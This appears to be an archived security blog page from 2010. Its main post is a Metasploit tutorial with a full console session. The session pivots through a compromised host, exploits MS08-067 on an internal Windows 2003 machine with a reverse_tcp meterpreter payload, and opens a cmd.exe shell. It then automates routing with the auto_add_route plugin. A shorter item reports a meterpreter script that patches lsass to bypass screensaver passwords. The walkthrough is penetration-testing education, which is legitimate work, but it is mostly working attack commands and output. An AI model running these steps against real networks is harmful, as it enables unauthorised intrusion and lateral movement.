Archive for February, 2010
The Relentless-coding blog just released a script for meterpreter that will bypass password protection for screensavers in Windows XP (SP2 & 3), Vista, and Windows 7. The script patches the lsass (you’ll need system level permissions) process to circumvent the password check. Once applied, an attacker can insert anything for the password to unlock. PaulDotCom has a video on vimeo demonstrating it.
One of the coolest features of any exploitation framework is the ability to further penetrate the network via the exploited host. Here is how to pivot an attack in Metasploit:
msf exploit(ms09_002_memory_corruption) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.109:8080 -> 192.168.1.104:62239
msf exploit(ms09_002_memory_corruption) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0d:29:d9:ec:cc
inet addr:192.168.1.109 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fee8:ebe7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14826 errors:12824 dropped:0 overruns:0 frame:0
TX packets:6634 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7542708 (7.5 MB) TX bytes:2385453 (2.3 MB)
Interrupt:19 Base address:0x2024
msf exploit(ms09_002_memory_corruption) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > route
Network routes
==============
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.55.2
192.168.55.0 255.255.255.0 192.168.55.140
192.168.55.140 255.255.255.255 127.0.0.1
127.0.0.0 255.0.0.0 127.0.0.1
224.0.0.0 240.0.0.0 192.168.55.140
255.255.255.255 255.255.255.255 192.168.55.140
meterpreter >
Background session 1? [y/N]y
msf exploit(ms09_002_memory_corruption) > route add 192.168.55.0 255.255.255.0 1
msf exploit(ms09_002_memory_corruption) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.55.0 255.255.255.0 Session 1
msf exploit(ms09_002_memory_corruption) > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/patchupmeterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.55.128
RHOST => 192.168.55.128
msf exploit(ms08_067_netapi) > set LPORT 9000
LPORT => 9000
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 2 - lang:English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (205835 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.1.109:9000 -> 192.168.1.104:62260)
meterpreter > execute -f cmd.exe -i
Process 3864 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 6:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.55.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.55.2
C:\WINDOWS\system32>exit
meterpreter >
Background session 2? [y/N]y
The problem is it requires a lot of typing. HD Moore has created a plug-in that automatically adds a route for previously unseen subnets when a new session opens up. Here is an example of its usage and output:
msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.128:2355)
[*] AutoAddRoute: Routing new subnet 192.168.1.0/255.255.255.0 through session 1
meterpreter > background
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.1.0 255.255.255.0 Session 1
msf exploit(ms08_067_netapi) >
Awesome…..
Thanks to Uncle Sam I will be taking the GCIA on the 27th of this month. Wish me luck, I doubt I will need it but I have heard that it is a ball buster. Im pretty confident I have the material down, and I will be taking the practice tests soon so I will have a bit of time to bone up on anything that I’m lacking.